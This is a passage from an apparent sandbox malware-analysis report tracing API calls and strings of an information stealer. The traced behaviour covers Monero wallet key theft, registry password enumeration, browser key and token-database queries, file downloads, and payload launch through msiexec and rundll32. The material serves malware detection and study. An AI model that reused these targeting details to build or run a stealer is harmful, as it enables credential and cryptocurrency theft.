                                • Instruction Fuzzy Hash: 394173BE9502186BDB10F760EC47FED7638AB65704F004494B645A60C2EEB46BCD8BB2
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D9906C
                                Strings
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 7f39fe26547323a55374b2d07773c980cac8cdf0a915db56ba7c2ce9ead539ac
                                • Instruction ID: 48079d00dc7f329720b3e75ae2df9654db29b2d3413a329a956e8bfd38f0e37e
                                • Opcode Fuzzy Hash: 7f39fe26547323a55374b2d07773c980cac8cdf0a915db56ba7c2ce9ead539ac
                                • Instruction Fuzzy Hash: 8E71B6B5A1020CABDB04EBE4DD99FEEB7B9FF48704F108508F615A7290DB34A905DB61
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00D931C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00D9335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00D934EA
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: ccfc5633a3e997968cb97f5da800aee359712528095651efe75b0e7902bfbc57
                                • Instruction ID: 71343bf4e2d6d1e1fbbfd0a3a7423df15d3693e8e64538fe119a131828c995cb
                                • Opcode Fuzzy Hash: ccfc5633a3e997968cb97f5da800aee359712528095651efe75b0e7902bfbc57
                                • Instruction Fuzzy Hash: 2E12EA72810118AADF19EBA4DD92FEEB778EF14300F504159F50666192EF346B4ACFB2
                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D86280: InternetOpenA.WININET(00DA0DFE,00000001,00000000,00000000,00000000), ref: 00D862E1
                                  • Part of subcall function 00D86280: StrCmpCA.SHLWAPI(?,0182EB68), ref: 00D86303
                                  • Part of subcall function 00D86280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D86335
                                  • Part of subcall function 00D86280: HttpOpenRequestA.WININET(00000000,GET,?,0182E1B0,00000000,00000000,00400100,00000000), ref: 00D86385
                                  • Part of subcall function 00D86280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D863BF
                                  • Part of subcall function 00D86280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D863D1
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D95318
                                • lstrlen.KERNEL32(00000000), ref: 00D9532F
                                  • Part of subcall function 00D98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D98E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00D95364
                                • lstrlen.KERNEL32(00000000), ref: 00D95383
                                • lstrlen.KERNEL32(00000000), ref: 00D953AE
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 3257e729362bcc09f0bf0d279ee6342fcab0fc47b5247288c845f9352134fbff
                                • Instruction ID: ab6f42ad454759c9818138b00bda0b2604d7856348c0c7f0893aeec003024fd8
                                • Opcode Fuzzy Hash: 3257e729362bcc09f0bf0d279ee6342fcab0fc47b5247288c845f9352134fbff
                                • Instruction Fuzzy Hash: D851FB359201589BDF14FF68D996AED7779EF10300F504128F40A6B592EF34AB4ACBB2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 128b54afcf273bf84556cd76a8ad4839d472919ecb6888c4f554b77d58ded1dc
                                • Instruction ID: 2180a96f8a7dcf7bd13bf15c8704ddde6c7014af7655ab3f168c53189177ff40
                                • Opcode Fuzzy Hash: 128b54afcf273bf84556cd76a8ad4839d472919ecb6888c4f554b77d58ded1dc
                                • Instruction Fuzzy Hash: ACC193B690021D9BCF14EF60DD8AFEA7378FB54304F004599E50AA7281DA74EA85DFB1
                                APIs
                                  • Part of subcall function 00D98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D98E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00D942EC
                                • lstrcat.KERNEL32(?,0182E150), ref: 00D9430B
                                • lstrcat.KERNEL32(?,?), ref: 00D9431F
                                • lstrcat.KERNEL32(?,0182D068), ref: 00D94333
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D98D90: GetFileAttributesA.KERNEL32(00000000,?,00D81B54,?,?,00DA564C,?,?,00DA0E1F), ref: 00D98D9F
                                  • Part of subcall function 00D89CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D89D39
                                  • Part of subcall function 00D899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D899EC
                                  • Part of subcall function 00D899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D89A11
                                  • Part of subcall function 00D899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D89A31
                                  • Part of subcall function 00D899C0: ReadFile.KERNEL32(000000FF,?,00000000,00D8148F,00000000), ref: 00D89A5A
                                  • Part of subcall function 00D899C0: LocalFree.KERNEL32(00D8148F), ref: 00D89A90
                                  • Part of subcall function 00D899C0: CloseHandle.KERNEL32(000000FF), ref: 00D89A9A
                                  • Part of subcall function 00D993C0: GlobalAlloc.KERNEL32(00000000,00D943DD,00D943DD), ref: 00D993D3
                                • StrStrA.SHLWAPI(?,0182E1F8), ref: 00D943F3
                                • GlobalFree.KERNEL32(?), ref: 00D94512
                                  • Part of subcall function 00D89AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89AEF
                                  • Part of subcall function 00D89AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00D84EEE,00000000,?), ref: 00D89B01
                                  • Part of subcall function 00D89AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D84EEE,00000000,00000000), ref: 00D89B2A
                                  • Part of subcall function 00D89AC0: LocalFree.KERNEL32(?,?,?,?,00D84EEE,00000000,?), ref: 00D89B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00D944A3
                                • StrCmpCA.SHLWAPI(?,00DA08D1), ref: 00D944C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00D944D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00D944E5
                                • lstrcat.KERNEL32(00000000,00DA0FB8), ref: 00D944F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: 24d62747f1035ddba5acbddb5c070713824d3b30b3d2240af240df725290cd6e
                                • Instruction ID: 862bc27c1e0ff6ee17cb2befe8237b99e96603dbf19c97624700683b67b36217
                                • Opcode Fuzzy Hash: 24d62747f1035ddba5acbddb5c070713824d3b30b3d2240af240df725290cd6e
                                • Instruction Fuzzy Hash: 037152B6900208ABCF14FBA4DC96FEE7379AB48304F044598F60597181EA35EB49DFB1
                                APIs
                                  • Part of subcall function 00D812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D812B4
                                  • Part of subcall function 00D812A0: RtlAllocateHeap.NTDLL(00000000), ref: 00D812BB
                                  • Part of subcall function 00D812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D812D7
                                  • Part of subcall function 00D812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D812F5
                                  • Part of subcall function 00D812A0: RegCloseKey.ADVAPI32(?), ref: 00D812FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00D8134F
                                • lstrlen.KERNEL32(?), ref: 00D8135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00D81377
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D98B60: GetSystemTime.KERNEL32(00DA0E1A,0182A480,00DA05AE,?,?,00D813F9,?,0000001A,00DA0E1A,00000000,?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D98B86
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00D81465
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D899EC
                                  • Part of subcall function 00D899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D89A11
                                  • Part of subcall function 00D899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D89A31
                                  • Part of subcall function 00D899C0: ReadFile.KERNEL32(000000FF,?,00000000,00D8148F,00000000), ref: 00D89A5A
                                  • Part of subcall function 00D899C0: LocalFree.KERNEL32(00D8148F), ref: 00D89A90
                                  • Part of subcall function 00D899C0: CloseHandle.KERNEL32(000000FF), ref: 00D89A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00D814EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 58756c96be4e220bf963ca69a7cf783a671e2f8246c32bc2324de7e413064fd6
                                • Instruction ID: e534b559216225f319dc196a9da0f77e78b38b273306555ff6d51ad1338928b8
                                • Opcode Fuzzy Hash: 58756c96be4e220bf963ca69a7cf783a671e2f8246c32bc2324de7e413064fd6
                                • Instruction Fuzzy Hash: 9B5123B29501199BCB15FB64DD92FED737CEF54300F404598B60AA2091EE706B89CFB6
                                APIs
                                  • Part of subcall function 00D872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D8733A
                                  • Part of subcall function 00D872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D873B1
                                  • Part of subcall function 00D872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D8740D
                                  • Part of subcall function 00D872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00D87452
                                  • Part of subcall function 00D872D0: HeapFree.KERNEL32(00000000), ref: 00D87459
                                • lstrcat.KERNEL32(00000000,00DA17FC), ref: 00D87606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00D87648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00D8765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00D8768F
                                • lstrcat.KERNEL32(00000000,00DA1804), ref: 00D876A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00D876D3
                                • lstrcat.KERNEL32(00000000,00DA1808), ref: 00D876ED
                                • task.LIBCPMTD ref: 00D876FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: e97e23e1ff637df88ad13ebd4f315a5517095ed556988c04622970704afb3b28
                                • Instruction ID: c21b3e53558195e15155ba56975fc64cb246e3e7b8b4ecf0301a1613a9c72296
                                • Opcode Fuzzy Hash: e97e23e1ff637df88ad13ebd4f315a5517095ed556988c04622970704afb3b28
                                • Instruction Fuzzy Hash: 1131277690020DEFCB44FBB4DD9ADEE7779EB44305B244118F102A7290DA34A946EBB2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0182E090,00000000,?,00DA0E2C,00000000,?,00000000), ref: 00D98130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D98137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00D98158
                                • __aulldiv.LIBCMT ref: 00D98172
                                • __aulldiv.LIBCMT ref: 00D98180
                                • wsprintfA.USER32 ref: 00D981AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: 1f77b37c83877f741556bcd4848e49a725f0fa598db8f5876dd45390e2bc6c16
                                • Instruction ID: 4207f82bf1b09a954ff419350017d5d7566ca1547c2fa53433b06383d0f1a3e6
                                • Opcode Fuzzy Hash: 1f77b37c83877f741556bcd4848e49a725f0fa598db8f5876dd45390e2bc6c16
                                • Instruction Fuzzy Hash: BF21F7B1E44218ABDB00DFD4CD4AFAEB7B8EB45B14F104609F605BB280D778A9018BB5
                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D84839
                                  • Part of subcall function 00D847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D84849
                                • InternetOpenA.WININET(00DA0DF7,00000001,00000000,00000000,00000000), ref: 00D8610F
                                • StrCmpCA.SHLWAPI(?,0182EB68), ref: 00D86147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00D8618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00D861B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00D861DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D8620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00D86249
                                • InternetCloseHandle.WININET(?), ref: 00D86253
                                • InternetCloseHandle.WININET(00000000), ref: 00D86260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: c793f8cac17c3913c7305c4517dba8a033a2602044f620da8fe1f65848f876a1
                                • Instruction ID: 672951caa364d4963cdfdb3e58f52a301cece6cb78ed2ebe934ee48b23e904dd
                                • Opcode Fuzzy Hash: c793f8cac17c3913c7305c4517dba8a033a2602044f620da8fe1f65848f876a1
                                • Instruction Fuzzy Hash: 2F515EB190021CABDF20EF50DD4ABEE77B8FF44705F108198A605A7181DB74AA89DFA5
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00D8733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00D873B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00D8740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00D87452
                                • HeapFree.KERNEL32(00000000), ref: 00D87459
                                • task.LIBCPMTD ref: 00D87555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: e5802d6159fee6be384500b5c8dbe43f8aa623422a3c4f37417483921f884f7d
                                • Instruction ID: 365331db1d78f5f5b62f63056638e44d8d27ecc5659b78c9fd708f02fbeb7ceb
                                • Opcode Fuzzy Hash: e5802d6159fee6be384500b5c8dbe43f8aa623422a3c4f37417483921f884f7d
                                • Instruction Fuzzy Hash: CC6128B590422C9BDB24EB50CC45BDAB7B8FF44304F1481E9E689A6141DB70AAC9CFB0
                                APIs
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A920: lstrcpy.KERNEL32(00000000,?), ref: 00D9A972
                                  • Part of subcall function 00D9A920: lstrcat.KERNEL32(00000000), ref: 00D9A982
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                • lstrlen.KERNEL32(00000000), ref: 00D8BC9F
                                  • Part of subcall function 00D98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D98E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00D8BCCD
                                • lstrlen.KERNEL32(00000000), ref: 00D8BDA5
                                • lstrlen.KERNEL32(00000000), ref: 00D8BDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: a7edac55ab866a105126300a2c3f82e7b57c605286e17c7144efff6c689147e6
                                • Instruction ID: 1617e74fda4bed09da3c4b340d14e6146d66c9bdef39e195e7324456dd020c1f
                                • Opcode Fuzzy Hash: a7edac55ab866a105126300a2c3f82e7b57c605286e17c7144efff6c689147e6
                                • Instruction Fuzzy Hash: C0B12872920118ABDF04FBA8DD96EEE7378FF54300F444569F506A6091EF346A49CBB2
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: f03054fb5e4bebe36ff7f748125532f9d8f4492d5bb9cd6fcbf1c814b10b1915
                                • Instruction ID: 29c1c14627c0e7dd5e4e3a2d1692a1f23c0e927382ed2179b34769419605ebfa
                                • Opcode Fuzzy Hash: f03054fb5e4bebe36ff7f748125532f9d8f4492d5bb9cd6fcbf1c814b10b1915
                                • Instruction Fuzzy Hash: E2F03A3090420DEFD7449FF0AE1EB2C7B70FB0470AF040199E60987690D670AA41ABA6
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D84FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D84FD1
                                • InternetOpenA.WININET(00DA0DDF,00000000,00000000,00000000,00000000), ref: 00D84FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00D85011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00D85041
                                • InternetCloseHandle.WININET(?), ref: 00D850B9
                                • InternetCloseHandle.WININET(?), ref: 00D850C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 23da1932d928b96bd22bf3655e19ccf8694aaebb449761881d210cad40fb3a51
                                • Instruction ID: 62ea9b2445e0251936d4d793b1dbf3ed81cc717fb91f1d12d0bcc31072e9a0bb
                                • Opcode Fuzzy Hash: 23da1932d928b96bd22bf3655e19ccf8694aaebb449761881d210cad40fb3a51
                                • Instruction Fuzzy Hash: 863107B5A0021CABDB20DF54DD85BDCB7B4FB48708F1081D9EA09A7280C7706AC59FA9
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D98426
                                • wsprintfA.USER32 ref: 00D98459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D9847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D9848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D98499
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                • RegQueryValueExA.ADVAPI32(00000000,0182E030,00000000,000F003F,?,00000400), ref: 00D984EC
                                • lstrlen.KERNEL32(?), ref: 00D98501
                                • RegQueryValueExA.ADVAPI32(00000000,0182DEE0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00DA0B34), ref: 00D98599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D98608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D9861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 6d169f2b02d60ee2ab485083e4c619997487c315a5cca67b9c3151b9b90d5ffb
                                • Instruction ID: 628ae18a6d59eea19b7e1c290fe949e9006a577e915e9786e71be4c065ad3935
                                • Opcode Fuzzy Hash: 6d169f2b02d60ee2ab485083e4c619997487c315a5cca67b9c3151b9b90d5ffb
                                • Instruction Fuzzy Hash: 242105B191022CABDB24DB54DD85FE9B3B8FB48704F00C598E609A7180DF71AA85DFE4
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D976A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D976AB
                                • RegOpenKeyExA.ADVAPI32(80000002,0181C0F0,00000000,00020119,00000000), ref: 00D976DD
                                • RegQueryValueExA.ADVAPI32(00000000,0182DF70,00000000,00000000,?,000000FF), ref: 00D976FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00D97708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 21f03f7ff8cde05143f7faf28d43387846332f796712744bf898b53169469b7b
                                • Instruction ID: 5f4fe971c52d2f0c92dc1696d4bfc57615504951223d73f168830d2aafb455ee
                                • Opcode Fuzzy Hash: 21f03f7ff8cde05143f7faf28d43387846332f796712744bf898b53169469b7b
                                • Instruction Fuzzy Hash: 9B0162B5A0420CBBEB00DBE4DE4EF6EB7B8EB48705F104054FA04D7290D670A9049B61
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D97734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D9773B
                                • RegOpenKeyExA.ADVAPI32(80000002,0181C0F0,00000000,00020119,00D976B9), ref: 00D9775B
                                • RegQueryValueExA.ADVAPI32(00D976B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00D9777A
                                • RegCloseKey.ADVAPI32(00D976B9), ref: 00D97784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: f611384808915a196e59465d7a694dcebbcbb22e998f9105f33d4df373bba1d5
                                • Instruction ID: 22bc1acec9a648a01ca5f04daecbb232f313ca5ec4ef1f556f9304e96216f674
                                • Opcode Fuzzy Hash: f611384808915a196e59465d7a694dcebbcbb22e998f9105f33d4df373bba1d5
                                • Instruction Fuzzy Hash: 210112B5A4030CBFEB00DBE4DD4AFAEB7B8EF48705F104559FA05A7281DA716A009F61
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D899EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D89A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00D89A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00D8148F,00000000), ref: 00D89A5A
                                • LocalFree.KERNEL32(00D8148F), ref: 00D89A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00D89A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 2f1446eceadf5aa15e162f78ff9c4dd4ebe569d0900973561486df79f10c51b9
                                • Instruction ID: ad963aaebd6df21e0fe7ffbb88a67fed910970197b3cd44bccd37ef19562b586
                                • Opcode Fuzzy Hash: 2f1446eceadf5aa15e162f78ff9c4dd4ebe569d0900973561486df79f10c51b9
                                • Instruction Fuzzy Hash: EB3105B4A0020DEFDB14DFA4C996FAEB7B9FF48304F148158E911A7290D774AA41CFA1
                                APIs
                                • lstrcat.KERNEL32(?,0182E150), ref: 00D947DB
                                  • Part of subcall function 00D98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D98E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00D94801
                                • lstrcat.KERNEL32(?,?), ref: 00D94820
                                • lstrcat.KERNEL32(?,?), ref: 00D94834
                                • lstrcat.KERNEL32(?,0181BA90), ref: 00D94847
                                • lstrcat.KERNEL32(?,?), ref: 00D9485B
                                • lstrcat.KERNEL32(?,0182D8E0), ref: 00D9486F
